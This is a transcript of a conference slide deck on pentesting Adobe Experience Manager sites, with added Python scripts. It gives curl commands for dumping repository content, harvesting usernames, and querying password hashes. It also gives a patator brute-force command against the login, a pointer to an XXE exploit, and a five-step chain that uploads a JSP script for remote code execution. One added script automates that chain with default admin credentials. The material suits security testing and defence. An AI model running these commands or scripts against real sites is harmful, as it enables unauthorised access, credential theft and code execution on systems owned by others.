Hacking Adobe Experience Manager sites
DESCRIPTION
This presentation is about pentesting AEM web applications. It was shown at the PHDays security conference.
TRANSCRIPT
-
Hack1ng Adobe Experience Manager sites
-
Who is that guy?
Mikhail Egorov
Security researcher
Works at Odin (Parallels)
0ang3el (at) gma1l (d0t) com
-
Related Work
http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/
http://www.slideshare.net/CQCON/prsentation-ben-zahler
https://docs.adobe.com/docs/en/aem/6-0/administer/security/security-checklist.html
-
What do we want
Sensitive information from JCR
Installed OSGI bundles
Custom scripts
Usernames
Password hashes
Elements that allow anonymous modification
-
Sensitive information from JCR
Use the JsonRendererServlet: Sling's default GET servlet renders any node as JSON. A numeric selector sets the depth, "tidy" pretty-prints, and "infinity" dumps the whole subtree (Sling caps an infinity dump at json.maximumresults, 200 nodes by default, and answers 300 Multiple Choices with shallower alternatives when the cap is exceeded)
curl -X GET http://127.0.0.1:8080/.json
curl -X GET http://127.0.0.1:8080/.6.json
curl -X GET http://127.0.0.1:8080/.tidy.6.json
curl -X GET http://127.0.0.1:8080/.tidy.infinity.json
-
Installed OSGI bundles
List all bundles:
curl -X GET http://127.0.0.1:8080/bin.tidy.infinity.json
QueryBuilder is your friend! http://docs.adobe.com/docs/en/cq/5-6-1/dam/customizing_and_extendingcq5dam/query_builder.html
curl -X GET http://127.0.0.1:8080/bin/querybuilder.json
-
Custom scripts
List custom scripts (everything deployed under /apps):
curl -X GET http://127.0.0.1:8080/apps.tidy.infinity.json
List compiled custom scripts from the class cache under /var/classes:
curl -X GET http://127.0.0.1:8080/var/classes.tidy.infinity.json
-
Usernames
Dump the content node properties, then extract usernames with a regular expression: the one-liner matches the value of every *By property (jcr:createdBy, jcr:lastModifiedBy, cq:lastModifiedBy, ...), and the dump is piped straight into it
curl -X GET http://127.0.0.1:8080/content.infinity.json |
python3 -c 'import sys,re; print("\n".join(m.group(1) for m in re.finditer(r"\"[^\"]*By\":\"(.+?)\"", sys.stdin.read())))' |
sort -u
-
Password hashes
Use the QueryBuilder bundle: query every rep:User node and ask only for rep:principalName and rep:password (quote the URL so the shell does not interpret the ampersands; the query returns only what the calling session may read, so run it with the best credentials you have)
curl -X GET 'http://127.0.0.1:8080/bin/querybuilder.json?type=rep:User&p.hits=selective&p.properties=rep:principalName%20rep:password&p.limit=100'
-
Anonymous modification
Dump the content node properties, then check with a regular expression whether any *By property names the anonymous user (the dump is piped straight into the one-liner)
curl -X GET http://127.0.0.1:8080/content.infinity.json |
python3 -c 'import sys,re; m = re.search(r"\"[^\"]*By\":\"anonymous\"", sys.stdin.read()); print("Anon modification:", "Yes" if m else "No")'
-
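Walking the dump as a JSON tree instead of grepping it is more reliable: property names are matched exactly and every hit keeps its node path. The script below is an added example, not from the slides. It parses what /content.infinity.json returns, lists the principals named in every *By property (the "Usernames" step) and reports the nodes whose creator or last modifier is anonymous (the "Anonymous modification" step). The sample dump embedded in it is constructed for the example, not captured from a real instance.

```python
"""Added example: walk a Sling JSON dump (the output of /content.infinity.json)
as a tree instead of grepping it. Reports every principal found in a *By
property and every node that anonymous created or last modified."""
import json
import sys
from collections import defaultdict

# Constructed sample dump for this example (not captured from a real AEM
# instance); the shape mirrors what the JsonRendererServlet emits.
SAMPLE_DUMP = json.dumps({
    "jcr:primaryType": "sling:OrderedFolder",
    "jcr:createdBy": "admin",
    "jcr:created": "Sun May 03 2015 21:24:38 GMT+0300",
    "site": {
        "jcr:primaryType": "cq:Page",
        "jcr:createdBy": "admin",
        "jcr:content": {
            "jcr:primaryType": "cq:PageContent",
            "jcr:lastModifiedBy": "author",
            "cq:lastModifiedBy": "author",
            "cq:tags": ["marketing", "2015"],
        },
        "guestbook": {
            "jcr:primaryType": "nt:unstructured",
            "jcr:createdBy": "anonymous",
            "jcr:lastModifiedBy": "anonymous",
            "entry_1": {
                "jcr:primaryType": "nt:unstructured",
                "jcr:createdBy": "anonymous",
                "jcr:lastModifiedBy": "admin",
            },
        },
    },
})


def walk(node, path="/"):
    """Yield (path, properties) for every node in the dump. In Sling's JSON a
    child node is a nested object; any other value (string, list, number,
    boolean) is a property of the current node."""
    props = {k: v for k, v in node.items() if not isinstance(v, dict)}
    yield path, props
    for name, child in node.items():
        if isinstance(child, dict):
            yield from walk(child, path.rstrip("/") + "/" + name)


def principals(dump):
    """Map each principal named in a *By property (jcr:createdBy,
    jcr:lastModifiedBy, cq:lastModifiedBy, ...) to the property names it
    appears in. Every key here is a real account name worth trying."""
    seen = defaultdict(set)
    for _, props in walk(json.loads(dump)):
        for key, value in props.items():
            if key.endswith("By") and isinstance(value, str):
                seen[value].add(key)
    return dict(seen)


def anonymous_touched(dump):
    """Paths of nodes that the anonymous user created or last modified. Such a
    node accepted an unauthenticated write, so it is the first place to try an
    unauthenticated POST against the Sling POST servlet."""
    return [path for path, props in walk(json.loads(dump))
            if any(k.endswith("By") and v == "anonymous" for k, v in props.items())]


if __name__ == "__main__":
    # Read a real dump from stdin when piped; fall back to the sample otherwise.
    data = SAMPLE_DUMP if sys.stdin.isatty() else sys.stdin.read()
    for user, keys in sorted(principals(data).items()):
        print("%-12s %s" % (user, ", ".join(sorted(keys))))
    anon = anonymous_touched(data)
    print("Anon modification:", "Yes" if anon else "No")
    for path in anon:
        print("   ", path)
```

Usage: `curl -s http://127.0.0.1:8080/content.infinity.json | python3 walk_dump.py` (the file name is arbitrary); run without piped input it processes the built-in sample. The nodes it flags are the ones to test for unauthenticated writes through the POST servlet.
-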
Getting access
Try default user credentials: admin/admin, author/author, anonymous/anonymous
Offline attack (brute-force the dumped hashes)
Online attack (brute-force logins against the POST servlet bundle)
patator http_fuzz url=http://127.0.0.1:8080/content/fake.json method=POST user_pass=FILE0:FILE1 0=users.txt 1=pass.txt auth_type=basic -x ignore:code!=200 --threads 5
-
You have access, now what?
XSS
CSRF
DoS
Read local files
RCE
Not covered, sorry!
-
Webdav bundle, XXE
CVE-2015-1833 ( http://seclists.org/oss-sec/2015/q2/518 )
The WebDAV OSGI bundle uses an XML parser that is not properly initialized, so external entities in request bodies are resolved (XXE)
Exploit - https://www.exploit-db.com/exploits/37110/
-
Webdav bundle, XXE
Out-of-band exploitation: http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html
Pros: works with anonymous credentials
Cons: you need an external server, and it is unstable
In-band exploitation
Pros: you do not need an external server, more stable
Cons: you need the credentials of a user that is able to modify some node in the JCR
-
Webdav bundle, XXE Demo
http://www.youtube.com/watch?v=Hg3AXoG89Gs
-
Remote code execution
We have node http://127.0.0.1:8080/rce
We have a script exec.jsp loaded into node http://127.0.0.1:8080/apps/rcetype; Sling script resolution maps the resource type rcetype to /apps/rcetype, and the selector exec picks exec.jsp there.
When someone navigates to http://127.0.0.1:8080/rce.exec our exec.jsp is executed.
Node /apps/rcetype as JSON:
{"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:folder","exec.jsp":{"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:file"}}
Node /rce as JSON:
{"sling:resourceType":"rcetype","jcr:primaryType":"nt:unstructured"}
-
Remote code execution
Step I: Create the rcetype node through the Sling POST servlet (steps I-IV need a session with write access under /content and /apps, which on a default install means an administrator)
curl -u admin:admin -Fjcr:primaryType=nt:folder http://127.0.0.1:8080/content/rcetype
-
Remote code execution
Step II: Upload the script exec.jsp into the rcetype node (a file part is stored as an nt:file child named after the form field; the field form below is reconstructed from that result, the transcript garbled the original argument)
curl -u admin:admin -F 'exec.jsp=@exec.jsp' http://127.0.0.1:8080/content/rcetype
-
Remote code execution
Step III: Copy rcetype to /apps (the POST servlet's copy operation; :dest is the destination path)
curl -u admin:admin -F:operation=copy -F:dest=/apps/rcetype http://127.0.0.1:8080/content/rcetype
-
Remote code execution
Step IV: Create the rce node bound to the rcetype resource type
curl -u admin:admin -Fsling:resourceType=rcetype http://127.0.0.1:8080/content/rce
-
Remote code execution
Step V: Launch the JSP script through the exec selector
curl -X GET http://127.0.0.1:8080/content/rce.exec
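The five steps as one script, added here and not part of the deck: it encodes the Sling POST servlet requests the curl commands send (multipart form fields as curl -F does, :operation=copy with :dest, sling:resourceType on the new node) and then requests the exec selector. Target, credentials and node names are taken from the slides; the exec.jsp body is a constructed placeholder, not the deck's script. plan() builds the request list so it can be inspected offline; run() sends it.

```python
"""Added example: the five-step Sling POST servlet chain from the slides as one
script. plan() builds the requests without sending anything; run() sends them."""
import base64
import urllib.error
import urllib.request
import uuid

# Assumptions: target and credentials as on the slides; the JSP body is a
# constructed placeholder, not the script used in the deck's demo.
BASE = "http://127.0.0.1:8080"
USER, PASSWORD = "admin", "admin"
EXEC_JSP = b'<%= "exec.jsp ran as " + request.getRemoteUser() %>'


def basic_auth(user, password):
    """Authorization header for HTTP Basic, which is what curl -u sends."""
    token = base64.b64encode(("%s:%s" % (user, password)).encode()).decode()
    return {"Authorization": "Basic " + token}


def multipart(fields, files):
    """Encode form fields and file parts as multipart/form-data, as curl -F
    does. The Sling POST servlet stores a plain field as a property and a file
    part as an nt:file child named after the field."""
    boundary = uuid.uuid4().hex
    body = bytearray()
    for name, value in fields.items():
        body += ('--%s\r\nContent-Disposition: form-data; name="%s"\r\n\r\n%s\r\n'
                 % (boundary, name, value)).encode()
    for name, (filename, data) in files.items():
        body += ('--%s\r\nContent-Disposition: form-data; name="%s"; filename="%s"\r\n'
                 'Content-Type: application/octet-stream\r\n\r\n'
                 % (boundary, name, filename)).encode()
        body += data + b"\r\n"
    body += ("--%s--\r\n" % boundary).encode()
    return "multipart/form-data; boundary=" + boundary, bytes(body)


def plan(base=BASE, jsp=EXEC_JSP, rtype="rcetype", node="rce"):
    """Ordered (step, method, url, fields, files) tuples. Steps I-IV are POST
    servlet calls; step V is the GET that makes Sling resolve
    sling:resourceType=rcetype plus selector exec to /apps/rcetype/exec.jsp."""
    src = "%s/content/%s" % (base, rtype)
    return [
        ("I   create " + rtype, "POST", src, {"jcr:primaryType": "nt:folder"}, {}),
        ("II  upload exec.jsp", "POST", src, {}, {"exec.jsp": ("exec.jsp", jsp)}),
        ("III copy to /apps", "POST", src, {":operation": "copy", ":dest": "/apps/" + rtype}, {}),
        ("IV  bind node to type", "POST", "%s/content/%s" % (base, node), {"sling:resourceType": rtype}, {}),
        ("V   run the script", "GET", "%s/content/%s.exec" % (base, node), {}, {}),
    ]


def run(steps, user=USER, password=PASSWORD):
    """Send each planned request in order; returns [(step, status, body head)]."""
    results = []
    for step, method, url, fields, files in steps:
        headers = basic_auth(user, password)
        data = None
        if method == "POST":
            headers["Content-Type"], data = multipart(fields, files)
        req = urllib.request.Request(url, data=data, headers=headers, method=method)
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                results.append((step, resp.status, resp.read(200)))
        except urllib.error.HTTPError as err:
            # A 4xx/5xx on an early step means the later ones cannot work;
            # keep the status so the caller can see where the chain broke.
            results.append((step, err.code, err.read(200)))
    return results


if __name__ == "__main__":
    for step, status, head in run(plan()):
        print(step, status, head.decode(errors="replace"))
```

Step III is the one that needs the broad permission: copying into /apps puts the script where the script resolver looks, so a session that can only write under /content never gets past it.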
-
Remote code execution, Demo
http://www.youtube.com/watch?v=Z9n2T07e6Ls
-
Ask a Ninja